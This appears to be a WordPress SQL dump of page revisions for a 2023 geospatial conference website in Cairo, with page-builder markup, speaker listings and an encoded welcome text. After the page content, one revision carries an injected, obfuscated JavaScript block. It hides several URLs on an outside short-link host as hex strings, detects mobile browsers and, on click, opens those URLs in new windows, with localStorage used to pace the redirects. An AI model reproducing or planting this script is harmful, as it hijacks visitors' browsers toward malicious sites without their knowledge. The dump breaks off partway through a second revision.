icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665116627203{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]More Information[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][dt_team_masonry][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 19:43:04','2022-10-06 19:43:04','',2167,'https://gsw2023.com/?p=2322',0,'revision','',0),
(2323,1,'2022-10-06 19:46:01','2022-10-06 19:46:01','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyM